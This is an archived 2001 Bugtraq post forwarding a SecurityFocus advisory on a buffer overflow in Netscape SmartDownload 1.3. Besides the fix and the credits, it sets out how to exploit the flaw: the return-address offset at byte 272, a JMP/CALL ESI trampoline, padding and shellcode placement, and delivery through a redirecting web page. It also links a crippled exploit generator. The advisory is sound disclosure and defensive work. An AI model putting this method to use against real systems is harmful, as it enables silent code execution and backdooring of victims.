[20306] in bugtraq
Netscape SmartDownload 1.3 Buffer Overflow Vulnerability
daemon@ATHENA.MIT.EDU (Alfred Huger)
Wed Apr 18 19:49:33 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.GSO.4.30.0104181706300.28322-100000@mail>
Date: Wed, 18 Apr 2001 17:18:02 -0600
Reply-To: Alfred Huger <ah@SECURITYFOCUS.COM>
From: Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hey Folks,
Elias has asked me to forward this writeup of the Netscape SmartDownload
1.3 Buffer Overflow Vulnerability to the list. This information has been
published elsewhere but this is it's first appearance to Bugtraq as it
were.
The format it is in that of the Commercial SecurityFocus Bugtraq Database
and if you have questions as to what some of the heading are there is a
legend at the end of the advisory.
---------------------------------------------------------------------------
Security Alert
Subject: Netscape SmartDownload 1.3 Buffer Overflow Vulnerability
BUGTRAQ ID: 2615 CVE ID: CAN-2001-0262
Published: April 13, 2001 Updated: April 18, 2001
Remote: Yes Local: No
Class: Boundary Condition Error
Credibility: Vendor Confirmed Ease: Exploit Available
Impact: 10.00 Severity: 10.00 Urgency: 9.60
Last Change: Initial analysis.
---------------------------------------------------------------------------
Vulnerable Systems:
Netscape SmartDownload 1.3
Non-Vulnerable Systems:
Netscape SmartDownload 1.4
Summary:
A buffer overflow present in a DLL used by Netscape SmartDownload is
exploitable even if the software is disabled.
Impact:
Successfully exploiting the buffer overflow in sdph20.dll would allow
an attacker to execute arbitrary code as the currently logged in user.
In Windows 95/98/Me, this means privileged access to all resources on
the target host.
Technical Description:
Netscape SmartDownload adds pause, resume and auto-restart download
capabilities to common web browsers such as Netscape Navigator,
Microsoft Internet Explorer and NeoPlanet. It is installed by default
with SmartDownload versions of Netscape Communicator, and marketed as
an add-on "download manager" for other browsers. It is available for
all Win32 platforms (Windows 95/98/Me, NT/2000).
All URLs visited by a user are analyzed and parsed by SmartDownload for
MIME type and extension to determine if the SmartDownload dialog box
should be presented, regardless of whether Smartdownload is enabled.
URLs parsed include web pages viewed within the browser (including
redirects), web pages within framesets and files spawned to external
viewers. Images, embeds and targets of object tags are not parsed by
SmartDownload.
A bug in the library 'sdph20.dll' used by SmartDownload prevents it
from properly parsing URLs greater than 256 characters in length. The
parsing code in sdph20.dll reserves 256 characters for an URL on the
stack but an unchecked lstrcpy will copy URLs of arbitrary length into
that buffer, overwriting several local variables, the return address
and other parts of the stack.
Analysis of sdph20.dll reveals that the ESI register will always point
to a location in memory with a predictable offset from the start of the
URL buffer after the parser function returns. This means that shellcode
[1] within the URL can be reached with a CALL ESI or JMP ESI
instruction if a known location containing either of those instructions
is inserted in the return address (byte 272).
If the overflow is successfully exploited, shellcode will be executed
by the victim with the privileges of the currently logged in user. If
the victim is using Windows 95, 98 or Me, the shellcode will be run
with privileged access to all system resources (local Administrator
access).
[1] SmartDownload places some restrictions on the characters permitted
in an URL - namely, reserved URL characters such as # : ? and & are
clipped or replaced. Additionally, the NULL character and some control
characters (ASCII < 32) are rejected outright by some web browsers.
Attack Scenarios:
Attacker finds a memory location known to contain a JMP ESI or CALL ESI
on the target host.
Attacker creates a 1000-byte string designed to overflow the URL parser
function in sdph20.dll. The attacker places the ESI jump address at
byte 272 of the string, and pads the remainder with equivalent-to-NOP
characters such as 0x41 (A).
The attacker creates shellcode and places it toward the end of the
string.
Attacker contructs a malicious webpage containing a redirect to the URL
or invisible frame containing the URL and lures victim to the webpage.
Attacker-supplied shellcode could, for example, download and install a
trojan horse or backdoor program on the victim host.
Exploits:
A utility is available that generates a web page that will exploit this
vulnerability. The exploit is intentionally crippled. This exploit
written by the SecurityFocus staff is of special interest because it is
executed transparently and without crashing the browser. A user who
had this type of exploit leveraged against them by surfing otherwise
innocent seeming web pages would never know they had been attacked and
possibly backdoored. There is a popular conception that exploits like
this on the client side (in terms of buffer overflows) will crash the
broswer and thereby alert the user to unusual activity. This is no
longer the case.
http://www.securityfocus.com/data/vulnerabilities/exploits/sdsploit.tar
.gz
Mitigating Strategies:
* Do not visit untrusted web sites
Solutions:
Netscape has released SmartDownload 1.4, which does not contain this
bug.
For Netscape SmartDownload 1.3:
Netscape upgrade SmartDownload 1.4
http://home.netscape.com/download/smartdownload.html
Credit:
Submitted to vulnhelp@securityfocus.com on 2 March, 2001 by Craig
Davison <cd@securityfocus.com>, Ryan Russell <ryan@securityfocus.com>
and Bruce Leidl <brl@core-sdi.com>. Also discovered independently by
Frank Swiderski <fes@atstake.com> and described in an @stake advisory
which was released on 13 April, 2001.
References:
web page:
About SmartDownload (Netscape)
http://home.netscape.com/computing/download/smartdownload/ib/about.html
web page:
Netscape SmartDownload Overflow (@stake)
http://www.atstake.com/research/advisories/2001/a041301-1.txt
ChangeLog:
Apr 18, 2001: Additional analysis.
---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT
BUGTRAQ ID: This is a unique identifier assigned to the
vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the
vulnerability by the CVE.
Published: The date the vulnerability was first made public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable
vulnerability.
Local: Whether this is a locally exploitable
vulnerability.
Credibility: Describes how credible the information about the
vulnerability is. Possible values are:
Conflicting Reports: The are multiple conflicting
about the existance of the vulnerability.
Single Source: There is a single non-reliable
source reporting the existence of the
vulnerability.
Reliable Source: There is a single reliable source
reporting the existence of the vulnerability.
Conflicting Details: There is consensus on the
existence of the vulnerability but not it's
details.
Multiple Sources: There is consensus on the
existence and details of the vulnerability.
Vendor Confirmed: The vendor has confirmed the
vulnerability.
Class: The class of vulnerability. Possible values are:
Boundary Condition Error, Access Validation Error,
Origin Validation Error, Input Valiadtion Error,
Failure to Handle Exceptional Conditions, Race
Condition Error, Serialization Error, Atomicity
Error, Environment Error, and Configuration Error.
Ease: Rates how easiliy the vulnerability can be
exploited. Possible values are: No Exploit
Available, Exploit Available, and No Exploit
Required.
Impact: Rates the impact of the vulnerability. It's range
is 1 through 10.
Severity: Rates the severity of the vulnerability. It's range
is 1 through 10. It's computed from the impact
rating and remote flag. Remote vulnerabiliteis with
a high impact rating receive a high severity
rating. Local vulnerabilities with a low impact
rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or
mitigate the vulnerability. It's range is 1 through
10. It's computed from the severity rating, the
ease rating, and the credibility rating. High
severity vulnerabilities with a high ease rating,
and a high confidence rating have a higher urgency
rating. Low severity vulnerabilities with a low
ease rating, and a low confidence rating have a
lower urgency rating.
Last Change: The last change made to the vulnerability
information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system
components is vulnerable vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a
vulnerability is found in IE you may see something
like:
Microsoft Internet Explorer
+ Microsoft Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the vulnerability.
Exploits: Exploit intructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com
